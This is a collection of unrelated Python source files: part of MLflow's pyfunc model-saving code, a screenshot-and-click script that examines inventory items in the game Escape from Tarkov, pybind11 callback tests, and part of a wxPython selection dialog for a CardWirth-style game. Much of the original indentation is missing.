numpy array, in which case it will be serialized to json by converting
it to a list. Bytes are base64-encoded.
:param await_registration_for: Number of seconds to wait for the model version to finish
being created and to reach the ``READY`` status. By default, the function
waits for five minutes. Specify 0 or None to skip waiting.
:param pip_requirements: {{ pip_requirements }}
:param extra_pip_requirements: {{ extra_pip_requirements }}
:return: A :py:class:`ModelInfo <mlflow.models.model.ModelInfo>` instance that contains the
metadata of the logged model.
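Example (a minimal sketch; ``AddN`` is the illustrative ``PythonModel``
subclass from the :py:func:`save_model` example):
.. code-block:: python
import mlflow
with mlflow.start_run():
    mlflow.pyfunc.log_model("add_n_model", python_model=AddN(n=5))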
"""
return Model.log(
artifact_path=artifact_path,
flavor=mlflow.pyfunc,
loader_module=loader_module,
data_path=data_path,
code_path=code_path,
python_model=python_model,
artifacts=artifacts,
conda_env=conda_env,
registered_model_name=registered_model_name,
signature=signature,
input_example=input_example,
await_registration_for=await_registration_for,
pip_requirements=pip_requirements,
extra_pip_requirements=extra_pip_requirements,
)
def _save_model_with_loader_module_and_data_path(
path,
loader_module,
data_path=None,
code_paths=None,
conda_env=None,
mlflow_model=None,
pip_requirements=None,
extra_pip_requirements=None,
):
"""
Export model as a generic Python function model.
:param path: The path to which to save the Python model.
:param loader_module: The name of the Python module that is used to load the model
from ``data_path``. This module must define a method with the prototype
``_load_pyfunc(data_path)``.
:param data_path: Path to a file or directory containing model data.
:param code_paths: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path before the model is loaded.
:param conda_env: Either a dictionary representation of a Conda environment or the path to a
Conda environment yaml file. If provided, this describes the environment
in which this model should be run.
:return: Model configuration containing model info.
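For illustration, a hypothetical ``loader_module`` might look like this (the
module name and the pickle-based loading are placeholders, not requirements):
.. code-block:: python
# my_loader_module.py
import pickle
def _load_pyfunc(data_path):
    # Return any object exposing a predict(model_input) method.
    with open(data_path, "rb") as f:
        return pickle.load(f)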
"""
data = None
if data_path is not None:
model_file = _copy_file_or_tree(src=data_path, dst=path, dst_dir="data")
data = model_file
code_dir_subpath = _validate_and_copy_code_paths(code_paths, path)
if mlflow_model is None:
mlflow_model = Model()
mlflow.pyfunc.add_to_model(
mlflow_model,
loader_module=loader_module,
code=code_dir_subpath,
data=data,
env=_CONDA_ENV_FILE_NAME,
)
mlflow_model.save(os.path.join(path, MLMODEL_FILE_NAME))
if conda_env is None:
if pip_requirements is None:
default_reqs = get_default_pip_requirements()
# To ensure `_load_pyfunc` can successfully load the model during the dependency
# inference, `mlflow_model.save` must be called beforehand to save an MLmodel file.
inferred_reqs = mlflow.models.infer_pip_requirements(
path,
FLAVOR_NAME,
fallback=default_reqs,
)
default_reqs = sorted(set(inferred_reqs).union(default_reqs))
else:
default_reqs = None
conda_env, pip_requirements, pip_constraints = _process_pip_requirements(
default_reqs,
pip_requirements,
extra_pip_requirements,
)
else:
conda_env, pip_requirements, pip_constraints = _process_conda_env(conda_env)
with open(os.path.join(path, _CONDA_ENV_FILE_NAME), "w") as f:
yaml.safe_dump(conda_env, stream=f, default_flow_style=False)
# Save `constraints.txt` if necessary
if pip_constraints:
write_to(os.path.join(path, _CONSTRAINTS_FILE_NAME), "\n".join(pip_constraints))
# Save `requirements.txt`
write_to(os.path.join(path, _REQUIREMENTS_FILE_NAME), "\n".join(pip_requirements))
return mlflow_model
loader_template = """
import importlib
import os
import sys
def load_pyfunc():
{update_path}return importlib.import_module('{main}')._load_pyfunc('{data_path}')
"""
|
tarkov_examine.py
|
import argparse
import logging
import threading
from collections import namedtuple
from time import sleep
from typing import List
import numpy as np
import cv2 as cv
from mss import mss
import pyautogui
parser = argparse.ArgumentParser()
parser.add_argument('--debug', action='store_true')
parser.add_argument('--no-wheel-click', action='store_true')
args = parser.parse_args()
logging.getLogger().setLevel(logging.INFO)
Point = namedtuple('Point', ['x', 'y'])
mon = {'left': 0, 'top': 0, 'width': 1920, 'height': 1080}
inv_p1 = Point(9, 262)
inv_p2 = Point(638, 954)
r_side = 62
scrollbar_x_pos = (640, 648)
PAGE_SIZE_Y = 11
PAGE_SIZE_X = 10
GREY_RANGE = ([64, 64, 64, 0], [86, 86, 86, 255])
DARK_GREY_RANGE = ([41, 41, 41, 0], [66, 66, 66, 255])
OBJECT_RANGE = ([14, 14, 14, 0], [30, 30, 30, 255])
GREY_THRESHOLD = 300
DARK_GREY_THRESHOLD = 300
OBJECT_THRESHOLD = 100
class Inventory:
pass
# todo If I ever come back to this, the code should be heavily refactored:
# todo - init_inventory_matrix
# todo - move other matrix requiring funcs to this class
# todo - reset_clicked_cells
# todo Because now it's just a kludge
def get_img_mask(img, lower_bound, upper_bound):
lower_grey = np.array(lower_bound)
upper_grey = np.array(upper_bound)
return cv.inRange(img, lower_grey, upper_grey)
def init_inventory_matrix(upper_left_corner: Point, r_side: int):
x1, y1 = upper_left_corner
inv_matrix = np.ndarray(shape=(PAGE_SIZE_Y, PAGE_SIZE_X, 2, 2), dtype=int)
for i in range(len(inv_matrix)):
for j in range(len(inv_matrix[i])):
inv_matrix[i][j] = [
[x1 + r_side * j + j, y1 + r_side * i + i],
[x1 + r_side * (j + 1) + j, y1 + r_side * (i + 1) + i]
]
return inv_matrix
def draw_rectangles(image, inv_matrix, inv_mask, color, thickness):
for i in range(len(inv_mask)):
for j in range(len(inv_mask[i])):
if inv_mask[i][j]:
box = inv_matrix[i][j]
cv.rectangle(image, *box, color, thickness)
def get_inv_mask(img_mask, inv_matrix, threshold):
inv_mask = np.zeros(shape=(len(inv_matrix), len(inv_matrix[0])), dtype=bool)
for i in range(len(inv_matrix)):
for j in range(len(inv_matrix[i])):
(x1, y1), (x2, y2) = inv_matrix[i][j]
nonzeros = np.count_nonzero(img_mask[y1:y2, x1:x2])
if nonzeros > threshold:
inv_mask[i][j] = True
return inv_mask
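# A self-contained sketch (not called by the script) of how the colour masks
# drive the cell grid: a cell is flagged once the count of in-range pixels
# inside it exceeds the threshold. The solid grey frame below is illustrative.
def _demo_inv_mask():
    demo_matrix = init_inventory_matrix(Point(0, 0), r_side)
    demo_img = np.full((mon['height'], mon['width'], 4), 75, dtype=np.uint8)
    demo_img[..., 3] = 255  # opaque alpha, matching BGRA screenshots from mss
    grey_mask = get_img_mask(demo_img, *GREY_RANGE)
    # Every cell is uniformly grey here, so the whole boolean grid is True.
    return get_inv_mask(grey_mask, demo_matrix, GREY_THRESHOLD)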
def get_box_center(box_x1, box_y1):
return Point(box_x1 + r_side / 2, box_y1 + r_side / 2)
def delete_clicked_items_from_mask(inv_mask, clicked_indexes):
for i, j in clicked_indexes:
inv_mask[i][j] = False
def mouse_clicker(coords_queue: List[Point]):
logging.info('mouse_clicker started')
try:
while True:
with new_mouse_coords_added:
logging.info('mouse_clicker waiting for coords')
new_mouse_coords_added.wait()
if stop_event.is_set():
logging.info('mouse_clicker stopping')
return
while len(coords_queue):
coords = coords_queue.pop(0)
if args.debug or args.no_wheel_click:
pyautogui.click(coords.x, coords.y)
else:
pyautogui.middleClick(coords.x, coords.y)
logging.info(f'Mouse click: {pyautogui.position()}')
pyautogui.moveTo(mon['width'], mon['height'] / 2)
except pyautogui.FailSafeException as error:
logging.info(error)
def get_item_inv_mask(img, inv_matrix):
img_mask_hatching_grey = get_img_mask(img, *GREY_RANGE)
img_mask_hatching_dark_grey = get_img_mask(img, *DARK_GREY_RANGE)
img_mask_object = get_img_mask(img, *OBJECT_RANGE)
inventory_mask_grey = get_inv_mask(
img_mask_hatching_grey, inv_matrix, GREY_THRESHOLD
)
inventory_mask_dark_grey = get_inv_mask(
img_mask_hatching_dark_grey, inv_matrix, DARK_GREY_THRESHOLD
)
inventory_mask_object = get_inv_mask(
img_mask_object, inv_matrix, OBJECT_THRESHOLD
)
inventory_mask_background = np.bitwise_and(
inventory_mask_grey, inventory_mask_dark_grey
)
inventory_mask_full_item = np.bitwise_and(
inventory_mask_background, inventory_mask_object
)
if args.debug:
cv.imshow('mask_hatching', get_inventory_area(img_mask_hatching_grey))
cv.imshow('img_mask_hatching_dark_grey', get_inventory_area(img_mask_hatching_dark_grey))
cv.imshow('img_mask_object', get_inventory_area(img_mask_object))
return inventory_mask_full_item
def take_screenshots_until_found(inv_matrix):
with mss() as sct:
logging.info('Taking screenshots...')
while True:
screenshot = sct.grab(mon)
img = np.array(screenshot)
inv_mask_full_item = get_item_inv_mask(img, inv_matrix)
if np.count_nonzero(inv_mask_full_item) > 0:
logging.info('Unexamined items found')
return img, inv_mask_full_item
def take_screenshot():
with mss() as sct:
screenshot = sct.grab(mon)
img = np.array(screenshot)
return img
def get_inventory_area(screen_img):
return screen_img[inv_p1.y:inv_p2.y, inv_p1.x:inv_p2.x]
def scroll_down(items: int):
pyautogui.click(inv_p2.x - r_side / 2, inv_p2.y)
for _ in range(items):
pyautogui.scroll(-1)
pyautogui.moveTo(mon['width'], mon['height'] / 2)
def is_scrollbar_at_bottom(img):
""" Checking an area here to prevent an edge case when mouse gets in the way """
# if area is bright, then it's at the bottom
return np.min(img[inv_p2.y:(inv_p2.y + int(r_side * 0.75)), scrollbar_x_pos[0]:scrollbar_x_pos[1]]) != 0
def main_loop():
inventory_matrix = init_inventory_matrix(inv_p1, r_side)
clicked_cells: List[tuple] = []
while True:
scr_img = take_screenshot()
# Get inventory mask with unexamined items
inventory_mask_full_item = get_item_inv_mask(scr_img, inventory_matrix)
# Remove clicked item from the mask
delete_clicked_items_from_mask(inventory_mask_full_item, clicked_cells)
if np.count_nonzero(inventory_mask_full_item) > 0:
logging.info('Unexamined items found')
if args.debug:
draw_rectangles(scr_img, inventory_matrix, inventory_mask_full_item, (0, 0, 255), 2)
cv.imshow('Tarkov examine', get_inventory_area(scr_img))
cv.waitKey(0)
item_indexes = np.where(inventory_mask_full_item)
if len(item_indexes[0]) == 0:
if is_scrollbar_at_bottom(scr_img):
logging.info('Reached the bottom, ending execution')
break
logging.info('No new items found, scrolling down')
scroll_down(PAGE_SIZE_Y)
clicked_cells = []
continue
index_x, index_y = item_indexes[0][0], item_indexes[1][0]
(x1, y1), _ = inventory_matrix[index_x][index_y]
# One click per screenshot to skip large already examined items
mouse_coords_queue.append(get_box_center(x1, y1))
clicked_cells.append((index_x, index_y))
with new_mouse_coords_added:
new_mouse_coords_added.notify()
sleep(1.1)
stop_event = threading.Event()
new_mouse_coords_added = threading.Condition()
mouse_coords_queue = []
mouse_click_thread = threading.Thread(target=mouse_clicker, args=[mouse_coords_queue])
mouse_click_thread.start()
try:
main_loop()
except KeyboardInterrupt:
logging.info('KeyboardInterrupt, stopping execution')
except Exception as e:
logging.error(e)
raise e
finally:
logging.info('Cleaning up...')
stop_event.set()
with new_mouse_coords_added:
new_mouse_coords_added.notify()
cv.destroyAllWindows()
mouse_click_thread.join()
|
test_callbacks.py
|
# -*- coding: utf-8 -*-
import pytest
from pybind11_tests import callbacks as m
from threading import Thread
import time
import env # NOQA: F401
def test_callbacks():
from functools import partial
def func1():
return "func1"
def func2(a, b, c, d):
return "func2", a, b, c, d
def func3(a):
return "func3({})".format(a)
assert m.test_callback1(func1) == "func1"
assert m.test_callback2(func2) == ("func2", "Hello", "x", True, 5)
assert m.test_callback1(partial(func2, 1, 2, 3, 4)) == ("func2", 1, 2, 3, 4)
assert m.test_callback1(partial(func3, "partial")) == "func3(partial)"
assert m.test_callback3(lambda i: i + 1) == "func(43) = 44"
f = m.test_callback4()
assert f(43) == 44
f = m.test_callback5()
assert f(number=43) == 44
def test_bound_method_callback():
# Bound Python method:
class MyClass:
def double(self, val):
return 2 * val
z = MyClass()
assert m.test_callback3(z.double) == "func(43) = 86"
z = m.CppBoundMethodTest()
assert m.test_callback3(z.triple) == "func(43) = 129"
def test_keyword_args_and_generalized_unpacking():
def f(*args, **kwargs):
return args, kwargs
assert m.test_tuple_unpacking(f) == (("positional", 1, 2, 3, 4, 5, 6), {})
assert m.test_dict_unpacking(f) == (
("positional", 1),
{
"key": "value",
"a": 1,
"b": 2
},
)
assert m.test_keyword_args(f) == ((), {"x": 10, "y": 20})
assert m.test_unpacking_and_keywords1(f) == ((1, 2), {"c": 3, "d": 4})
assert m.test_unpacking_and_keywords2(f) == (
("positional", 1, 2, 3, 4, 5),
{
"key": "value",
"a": 1,
"b": 2,
"c": 3,
"d": 4,
"e": 5
},
)
with pytest.raises(TypeError) as excinfo:
m.test_unpacking_error1(f)
assert "Got multiple values for keyword argument" in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
m.test_unpacking_error2(f)
assert "Got multiple values for keyword argument" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
m.test_arg_conversion_error1(f)
assert "Unable to convert call argument" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
m.test_arg_conversion_error2(f)
assert "Unable to convert call argument" in str(excinfo.value)
def test_lambda_closure_cleanup():
m.test_cleanup()
cstats = m.payload_cstats()
assert cstats.alive() == 0
assert cstats.copy_constructions == 1
assert cstats.move_constructions >= 1
def test_cpp_function_roundtrip():
"""Test if passing a function pointer from C++ -> Python -> C++ yields the original pointer"""
assert (m.test_dummy_function(m.dummy_function) == "matches dummy_function: eval(1) = 2")
assert (m.test_dummy_function(m.roundtrip(m.dummy_function)) == "matches dummy_function: eval(1) = 2")
assert (m.test_dummy_function(m.dummy_function_overloaded) == "matches dummy_function: eval(1) = 2")
assert m.roundtrip(None, expect_none=True) is None
assert (m.test_dummy_function(lambda x: x + 2) == "can't convert to function pointer: eval(1) = 3")
with pytest.raises(TypeError) as excinfo:
m.test_dummy_function(m.dummy_function2)
assert "incompatible function arguments" in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
m.test_dummy_function(lambda x, y: x + y)
assert any(
s in str(excinfo.value) for s in ("missing 1 required positional argument", "takes exactly 2 arguments"))
def test_function_signatures(doc):
assert doc(m.test_callback3) == "test_callback3(arg0: Callable[[int], int]) -> str"
assert doc(m.test_callback4) == "test_callback4() -> Callable[[int], int]"
def test_movable_object():
assert m.callback_with_movable(lambda _: None) is True
@pytest.mark.skipif(
"env.PYPY",
reason="PyPy segfaults on here. See discussion on #1413.",
)
def test_python_builtins():
"""Test if python builtins like sum() can be used as callbacks"""
assert m.test_sum_builtin(sum, [1, 2, 3]) == 6
assert m.test_sum_builtin(sum, []) == 0
def test_async_callbacks():
# serves as state for async callback
class Item:
def __init__(self, value):
self.value = value
res = []
# generate stateful lambda that will store result in `res`
def gen_f():
s = Item(3)
return lambda j: res.append(s.value + j)
# do some work async
work = [1, 2, 3, 4]
m.test_async_callback(gen_f(), work)
# wait until work is done
from time import sleep
sleep(0.5)
assert sum(res) == sum(x + 3 for x in work)
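# A hedged alternative to the fixed sleep above (a sketch, not used by the
# tests): poll with a deadline so slow machines still pass while failures
# surface quickly instead of flaking.
def _wait_until(predicate, timeout=5.0, interval=0.01):
    deadline = time.time() + timeout
    while time.time() < deadline:
        if predicate():
            return True
        time.sleep(interval)
    return False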
def test_async_async_callbacks():
t = Thread(target=test_async_callbacks)
t.start()
t.join()
def test_callback_num_times():
# Super-simple micro-benchmarking related to PR #2919.
# Example runtimes (Intel Xeon 2.2GHz, fully optimized):
# num_millions 1, repeats 2: 0.1 secs
# num_millions 20, repeats 10: 11.5 secs
one_million = 1000000
num_millions = 1 # Try 20 for actual micro-benchmarking.
repeats = 2 # Try 10.
rates = []
for rep in range(repeats):
t0 = time.time()
m.callback_num_times(lambda: None, num_millions * one_million)
td = time.time() - t0
rate = num_millions / td if td else 0
rates.append(rate)
if not rep:
print()
print("callback_num_times: {:d} million / {:.3f} seconds = {:.3f} million / second".format(
num_millions, td, rate))
if len(rates) > 1:
print("Min Mean Max")
print("{:6.3f} {:6.3f} {:6.3f}".format(min(rates), sum(rates) / len(rates), max(rates)))
|
select.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
import threading
import shutil
import itertools
import wx
import cw
import cw.binary.cwfile
import cw.binary.environment
import cw.binary.party
import cw.binary.adventurer
import message
import charainfo
#-------------------------------------------------------------------------------
# Selection dialog superclass
#-------------------------------------------------------------------------------
class Select(wx.Dialog):
def __init__(self, parent, name):
wx.Dialog.__init__(self, parent, -1, name,
style=wx.CAPTION|wx.SYSTEM_MENU|wx.CLOSE_BOX)
self.cwpy_debug = False
self._processing = False
self.list = []
self.toppanel = None
self.additionals = []
self.addctrlbtn = None
self._paperslide = False
self._paperslide2 = False
# panel
self.panel = wx.Panel(self, -1, size=(-1,cw.wins(30)))
# buttonlist
self.buttonlist = []
# leftjump
bmp = cw.cwpy.rsrc.buttons["LJUMP"]
self.left2btn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((30, 30)), bmp=bmp, chain=True)
# left
bmp = cw.cwpy.rsrc.buttons["LMOVE"]
self.leftbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_UP, cw.wins((30, 30)), bmp=bmp, chain=True)
# right
bmp = cw.cwpy.rsrc.buttons["RMOVE"]
self.rightbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_DOWN, cw.wins((30, 30)), bmp=bmp, chain=True)
# rightjump
bmp = cw.cwpy.rsrc.buttons["RJUMP"]
self.right2btn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((30, 30)), bmp=bmp, chain=True)
# focus
self.panel.SetFocusIgnoringChildren()
# To keep double-click and mouse-up from conflicting,
# OnSelectBase() is only called after a mouse-down on the
# toppanel is followed by a mouse-up
self._downbutton = -1
self.previd = wx.NewId()
self.nextid = wx.NewId()
self.leftkeyid = wx.NewId()
self.rightkeyid = wx.NewId()
self.left2keyid = wx.NewId()
self.right2keyid = wx.NewId()
self.backid = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnPrevButton, id=self.previd)
self.Bind(wx.EVT_MENU, self.OnNextButton, id=self.nextid)
self.Bind(wx.EVT_MENU, self.OnCancel, id=self.backid)
self.Bind(wx.EVT_MENU, self.OnClickLeftBtn, id=self.leftkeyid)
self.Bind(wx.EVT_MENU, self.OnClickRightBtn, id=self.rightkeyid)
self.Bind(wx.EVT_MENU, self.OnClickLeft2Btn, id=self.left2keyid)
self.Bind(wx.EVT_MENU, self.OnClickRight2Btn, id=self.right2keyid)
seq = [
(wx.ACCEL_NORMAL, wx.WXK_LEFT, self.previd),
(wx.ACCEL_NORMAL, wx.WXK_RIGHT, self.nextid),
(wx.ACCEL_NORMAL, wx.WXK_BACK, self.backid),
(wx.ACCEL_NORMAL, ord('_'), self.backid),
(wx.ACCEL_CTRL, wx.WXK_LEFT, self.leftkeyid),
(wx.ACCEL_CTRL, wx.WXK_RIGHT, self.rightkeyid),
(wx.ACCEL_CTRL|wx.ACCEL_ALT, wx.WXK_LEFT, self.left2keyid),
(wx.ACCEL_CTRL|wx.ACCEL_ALT, wx.WXK_RIGHT, self.right2keyid),
]
self.accels = seq
cw.util.set_acceleratortable(self, seq, ignoreleftrightkeys=(wx.TextCtrl, wx.Dialog))
def _bind(self):
self.Bind(wx.EVT_BUTTON, self.OnClickLeftBtn, self.leftbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickLeft2Btn, self.left2btn)
self.Bind(wx.EVT_BUTTON, self.OnClickRightBtn, self.rightbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickRight2Btn, self.right2btn)
self.Bind(wx.EVT_MOUSEWHEEL, self.OnMouseWheel)
def empty(event):
pass
self.toppanel.Bind(wx.EVT_ERASE_BACKGROUND, empty)
self.toppanel.Bind(wx.EVT_MIDDLE_DOWN, self.OnMouseDown)
self.toppanel.Bind(wx.EVT_LEFT_DOWN, self.OnMouseDown)
self.toppanel.Bind(wx.EVT_MIDDLE_UP, self.OnSelectBase)
self.toppanel.Bind(wx.EVT_LEFT_UP, self.OnSelectBase)
def recurse(ctrl):
if not isinstance(ctrl, (wx.TextCtrl, wx.SpinCtrl)):
ctrl.Bind(wx.EVT_RIGHT_UP, self.OnCancel)
ctrl.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
for child in ctrl.GetChildren():
recurse(child)
recurse(self)
self.toppanel.Bind(wx.EVT_PAINT, self.OnPaint2)
self.toppanel.Bind(wx.EVT_MOTION, self.OnMotion)
buttonlist = filter(lambda button: button.IsEnabled(), self.buttonlist)
if buttonlist:
buttonlist[0].SetFocus()
def is_processing(self):
return self._processing
def OnPrevButton(self, event):
focus = wx.Window.FindFocus()
buttonlist = filter(lambda button: button.IsEnabled(), self.buttonlist)
if buttonlist:
if focus in buttonlist:
index = buttonlist.index(focus)
buttonlist[index-1].SetFocus()
else:
buttonlist[-1].SetFocus()
def OnNextButton(self, event):
focus = wx.Window.FindFocus()
buttonlist = filter(lambda button: button.IsEnabled(), self.buttonlist)
if buttonlist:
if focus in buttonlist:
index = buttonlist.index(focus)
buttonlist[(index+1) % len(buttonlist)].SetFocus()
else:
buttonlist[0].SetFocus()
def OnMotion(self, evt):
if not self._paperslide:
self._update_mousepos()
self._paperslide2 = False
self._paperslide3 = False
self._paperslide_d = False
# reproduce the paper-slide bug
self._paperslide = False
def _update_mousepos(self):
if not self.can_clickside():
if self.can_clickcenter():
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_FINGER"])
else:
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_ARROW"])
self.clickmode = 0
return
rect = self.toppanel.GetClientRect()
x, _y = self.toppanel.ScreenToClient(wx.GetMousePosition())
if x < rect.x + rect.width / 4 and self.leftbtn.IsEnabled():
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_BACK"])
self.clickmode = wx.LEFT
elif rect.x + rect.width / 4 * 3 < x and self.rightbtn.IsEnabled():
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_FORE"])
self.clickmode = wx.RIGHT
else:
if self.can_clickcenter():
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_FINGER"])
else:
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_ARROW"])
self.clickmode = 0
def OnClickLeftBtn(self, evt):
if len(self.list) <= 1:
return
if not (self._paperslide or self._paperslide2) and not self.can_clickcenter():
self._paperslide_d = True
self._paperslide3 = True
if self.index == 0:
self.index = len(self.list) -1
else:
self.index -= 1
cw.cwpy.play_sound("page")
self.draw(True)
self.index_changed()
def OnClickLeft2Btn(self, evt):
if len(self.list) <= 1:
return
if self.index == 0:
self.index = len(self.list) -1
elif self.index - 10 < 0:
self.index = 0
else:
self.index -= 10
cw.cwpy.play_sound("page")
self.draw(True)
self.index_changed()
def OnClickRightBtn(self, evt):
if len(self.list) <= 1:
return
if not (self._paperslide or self._paperslide2) and not self.can_clickcenter():
self._paperslide_d = True
self._paperslide3 = True
if self.index == len(self.list) -1:
self.index = 0
else:
self.index += 1
cw.cwpy.play_sound("page")
self.draw(True)
self.index_changed()
def OnClickRight2Btn(self, evt):
if len(self.list) <= 1:
return
if self.index == len(self.list) -1:
self.index = 0
elif self.index + 10 > len(self.list) -1:
self.index = len(self.list) -1
else:
self.index += 10
cw.cwpy.play_sound("page")
self.draw(True)
self.index_changed()
def OnKeyDown(self, event):
pass
def index_changed(self):
pass
def OnMouseWheel(self, event):
if cw.util.has_modalchild(self):
return
if not self.list or len(self.list) == 1:
return
if cw.util.get_wheelrotation(event) > 0:
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_UP)
self.ProcessEvent(btnevent)
else:
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_DOWN)
self.ProcessEvent(btnevent)
def OnMouseDown(self, event):
if cw.util.has_modalchild(self):
return
self._downbutton = event.GetButton()
def OnSelectBase(self, event):
if self._processing:
return
if self._downbutton != event.GetButton():
self._downbutton = -1
return
self._downbutton = -1
self._update_mousepos()
if self.clickmode == wx.LEFT and self.leftbtn.IsEnabled():
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self.leftbtn.GetId())
self.ProcessEvent(btnevent)
elif self.clickmode == wx.RIGHT and self.rightbtn.IsEnabled():
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self.rightbtn.GetId())
self.ProcessEvent(btnevent)
else:
self.OnSelect(event)
def OnSelect(self, event):
if not self.list:
return
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_OK)
self.ProcessEvent(btnevent)
def OnCancel(self, event):
cw.cwpy.play_sound("click")
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_CANCEL)
self.ProcessEvent(btnevent)
def OnPaint2(self, event):
self.draw()
def draw(self, update=False):
if not self.toppanel.IsShown():
return None
if update:
dc = wx.ClientDC(self.toppanel)
dc = wx.BufferedDC(dc, self.toppanel.GetSize())
else:
dc = wx.BufferedPaintDC(self.toppanel)
return dc
def _do_layout(self):
sizer_1 = wx.BoxSizer(wx.VERTICAL)
self.set_panelsizer()
self.topsizer = wx.BoxSizer(wx.VERTICAL)
self.topsizer.Add(self.toppanel, 1, wx.EXPAND, 0)
self._add_topsizer()
sizer_1.Add(self.topsizer, 1, wx.EXPAND, 0)
sizer_1.Add(self.panel, 0, wx.EXPAND, 0)
self.SetSizer(sizer_1)
sizer_1.Fit(self)
self.Layout()
def _add_topsizer(self):
pass
def set_panelsizer(self):
sizer_panel = wx.BoxSizer(wx.HORIZONTAL)
sizer_panel.Add(self.left2btn, 0, 0, 0)
sizer_panel.Add(self.leftbtn, 0, 0, 0)
# add the buttons to sizer_panel
for button in self.buttonlist:
sizer_panel.AddStretchSpacer(1)
sizer_panel.Add(button, 0, wx.TOP|wx.BOTTOM, cw.wins(3))
sizer_panel.AddStretchSpacer(1)
sizer_panel.Add(self.rightbtn, 0, 0, 0)
sizer_panel.Add(self.right2btn, 0, 0, 0)
self.panel.SetSizer(sizer_panel)
def _disable_btn(self, enables=[][:]):
lrbtns = (self.rightbtn, self.right2btn, self.leftbtn, self.left2btn)
for btn in itertools.chain(self.buttonlist, lrbtns):
if btn in enables:
btn.Enable()
else:
btn.Disable()
def _enable_btn(self, disables=[][:]):
lrbtns = (self.rightbtn, self.right2btn, self.leftbtn, self.left2btn)
for btn in itertools.chain(self.buttonlist, lrbtns):
if btn in disables:
btn.Disable()
else:
btn.Enable()
def can_clickcenter(self):
"""パネルの中央部分をクリックで決定可能ならTrue。"""
return True
def can_clickside(self):
"""パネルの左右クリックでページ切替可能ならTrue。"""
return True
def _init_narrowpanel(self, choices, narrowtext, narrowtype, tworows=False):
font = cw.cwpy.rsrc.get_wxfont("paneltitle2", pixelsize=cw.wins(13))
if tworows:
self.narrow = wx.TextCtrl(self, -1, size=(cw.wins(0), -1), style=wx.TE_PROCESS_ENTER | wx.SIMPLE_BORDER)
else:
self.narrow = wx.TextCtrl(self, -1, size=(cw.wins(0), -1), style=wx.SIMPLE_BORDER)
self.narrow_label = wx.StaticText(self, -1, label=cw.cwpy.msgs["narrow_condition"])
self.narrow_label.SetFont(font)
self.narrow.SetFont(font)
self.narrow.SetValue(narrowtext)
# self.narrow_label = wx.StaticText(self, -1, label=cw.cwpy.msgs["narrow_condition2"])
# self.narrow_label.SetFont(font)
cfont = cw.cwpy.rsrc.get_wxfont("combo", pixelsize=cw.wins(13))
self.narrow_type = wx.Choice(self, -1, size=(-1, -1), choices=choices)
self.narrow_type.SetFont(cfont)
self.narrow_type.SetSelection(narrowtype)
self.narrow.Bind(wx.EVT_TEXT, self.OnNarrowCondition)
self.narrow.Bind(wx.EVT_TEXT_ENTER, self.OnFind)
self.narrow_type.Bind(wx.EVT_CHOICE, self.OnNarrowCondition)
def OnFind(self, event):
pass
def OnNarrowCondition(self, event):
if self._processing:
return
cw.cwpy.play_sound("page")
# Japanese IME input can fire many events at once,
# so defer applying the narrowing filter
self._reserved_narrowconditin = True
if wx.Window.FindFocus() != self.narrow:
self.toppanel.SetFocus()
def func():
if not self._reserved_narrowconditin:
return
self._on_narrowcondition()
self._reserved_narrowconditin = False
wx.CallAfter(func)
def _on_narrowcondition(self):
pass
def create_addctrlbtn(self, parent, bg, show):
"""追加的なコントロールの表示切替を行うボタンを生成する。
parent: ボタンの親コントロール。
bg: ボタンの背景色の基準となるwx.Bitmap。
show: 表示の初期状態。
"""
if self.addctrlbtn:
self.addctrlbtn.Destroy()
self.addctrlbtn = wx.lib.buttons.ThemedGenBitmapToggleButton(parent, -1, None, size=cw.wins((24, 24)))
if not cw.cwpy.setting.show_addctrlbtn:
self.addctrlbtn.Hide()
self.addctrlbtn.SetToggle(show)
img = cw.util.convert_to_image(bg)
x, y = img.GetWidth()-12, 0
r, g, b = img.GetRed(x, y), img.GetGreen(x, y), img.GetBlue(x, y)
colour = wx.Colour(r, g, b)
self.addctrlbtn.SetBackgroundColour(colour)
self.Bind(wx.EVT_BUTTON, self.OnAdditionalControls, self.addctrlbtn)
self.addctrlbtn.SetCursor(wx.StockCursor(wx.CURSOR_ARROW))
def update_additionals(self):
"""表示状態の切り替え時に呼び出される。"""
show = self.addctrlbtn.GetToggle()
for ctrl in self.additionals:
if isinstance(ctrl, tuple):
ctrl, forceshow = ctrl
ctrl.Show(show or forceshow())
else:
ctrl.Show(show)
if show:
bmp = cw.cwpy.rsrc.dialogs["HIDE_CONTROLS"]
else:
bmp = cw.cwpy.rsrc.dialogs["SHOW_CONTROLS"]
self.addctrlbtn.SetBitmapFocus(bmp)
self.addctrlbtn.SetBitmapLabel(bmp)
self.addctrlbtn.SetBitmapSelected(bmp)
def append_addctrlaccelerator(self, seq):
"""アクセラレータキーリストseqに追加的コントロール
表示切替のショートカットキー`Ctrl+F`を追加する。
"""
addctrl = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnToggleAdditionalControls, id=addctrl)
